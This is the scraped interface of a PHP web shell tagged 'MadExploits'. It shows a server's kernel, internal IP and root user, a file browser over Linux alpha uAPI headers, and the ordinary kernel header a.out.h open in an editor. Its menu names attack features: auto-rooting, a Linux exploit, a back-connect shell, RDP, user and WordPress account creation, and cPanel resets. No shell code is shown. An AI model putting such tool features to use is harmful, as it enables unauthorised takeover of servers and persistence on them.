Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
linux /
uapi /
alpha /
asm /
[ HOME SHELL ]
Name
Size
Permission
Action
a.out.h
1.99
KB
-rw-r--r--
auxvec.h
774
B
-rw-r--r--
bitsperlong.h
237
B
-rw-r--r--
bpf_perf_event.h
40
B
-rw-r--r--
byteorder.h
194
B
-rw-r--r--
compiler.h
3.6
KB
-rw-r--r--
console.h
1.14
KB
-rw-r--r--
errno.h
5.31
KB
-rw-r--r--
fcntl.h
1.86
KB
-rw-r--r--
fpu.h
4.51
KB
-rw-r--r--
gentrap.h
1.43
KB
-rw-r--r--
ioctl.h
2.3
KB
-rw-r--r--
ioctls.h
4.44
KB
-rw-r--r--
ipcbuf.h
32
B
-rw-r--r--
mman.h
3.81
KB
-rw-r--r--
msgbuf.h
32
B
-rw-r--r--
pal.h
1020
B
-rw-r--r--
param.h
298
B
-rw-r--r--
poll.h
30
B
-rw-r--r--
posix_types.h
513
B
-rw-r--r--
ptrace.h
1.72
KB
-rw-r--r--
reg.h
1005
B
-rw-r--r--
regdef.h
1.04
KB
-rw-r--r--
resource.h
761
B
-rw-r--r--
sembuf.h
32
B
-rw-r--r--
setup.h
172
B
-rw-r--r--
shmbuf.h
32
B
-rw-r--r--
sigcontext.h
891
B
-rw-r--r--
siginfo.h
155
B
-rw-r--r--
signal.h
2.43
KB
-rw-r--r--
socket.h
4.07
KB
-rw-r--r--
sockios.h
505
B
-rw-r--r--
stat.h
1.05
KB
-rw-r--r--
statfs.h
314
B
-rw-r--r--
swab.h
1.21
KB
-rw-r--r--
sysinfo.h
775
B
-rw-r--r--
termbits.h
4.14
KB
-rw-r--r--
termios.h
1.48
KB
-rw-r--r--
types.h
869
B
-rw-r--r--
unistd.h
501
B
-rw-r--r--
unistd_32.h
13.35
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : a.out.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ #ifndef __ALPHA_A_OUT_H__ #define __ALPHA_A_OUT_H__ #include <linux/types.h> /* * OSF/1 ECOFF header structs. ECOFF files consist of: * - a file header (struct filehdr), * - an a.out header (struct aouthdr), * - one or more section headers (struct scnhdr). * The filhdr's "f_nscns" field contains the * number of section headers. */ struct filehdr { /* OSF/1 "file" header */ __u16 f_magic, f_nscns; __u32 f_timdat; __u64 f_symptr; __u32 f_nsyms; __u16 f_opthdr, f_flags; }; struct aouthdr { __u64 info; /* after that it looks quite normal.. */ __u64 tsize; __u64 dsize; __u64 bsize; __u64 entry; __u64 text_start; /* with a few additions that actually make sense */ __u64 data_start; __u64 bss_start; __u32 gprmask, fprmask; /* bitmask of general & floating point regs used in binary */ __u64 gpvalue; }; struct scnhdr { char s_name[8]; __u64 s_paddr; __u64 s_vaddr; __u64 s_size; __u64 s_scnptr; __u64 s_relptr; __u64 s_lnnoptr; __u16 s_nreloc; __u16 s_nlnno; __u32 s_flags; }; struct exec { /* OSF/1 "file" header */ struct filehdr fh; struct aouthdr ah; }; /* * Define's so that the kernel exec code can access the a.out header * fields... */ #define a_info ah.info #define a_text ah.tsize #define a_data ah.dsize #define a_bss ah.bsize #define a_entry ah.entry #define a_textstart ah.text_start #define a_datastart ah.data_start #define a_bssstart ah.bss_start #define a_gprmask ah.gprmask #define a_fprmask ah.fprmask #define a_gpvalue ah.gpvalue #define N_TXTADDR(x) ((x).a_textstart) #define N_DATADDR(x) ((x).a_datastart) #define N_BSSADDR(x) ((x).a_bssstart) #define N_DRSIZE(x) 0 #define N_TRSIZE(x) 0 #define N_SYMSIZE(x) 0 #define AOUTHSZ sizeof(struct aouthdr) #define SCNHSZ sizeof(struct scnhdr) #define SCNROUND 16 #define N_TXTOFF(x) \ ((long) N_MAGIC(x) == ZMAGIC ? 0 : \ (sizeof(struct exec) + (x).fh.f_nscns*SCNHSZ + SCNROUND - 1) & ~(SCNROUND - 1)) #endif /* __ALPHA_A_OUT_H__ */
Close